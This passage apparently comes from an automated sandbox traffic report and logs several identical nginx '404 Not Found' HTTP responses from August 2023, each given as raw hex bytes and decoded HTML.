                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:07 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:09 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:11 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:17 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:19 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:21 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:23 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:28 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0 (Ubuntu)Date: Thu, 17 Aug 2023 12:35:30 GMTContent-Type: text/htmlContent-Length: 564Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
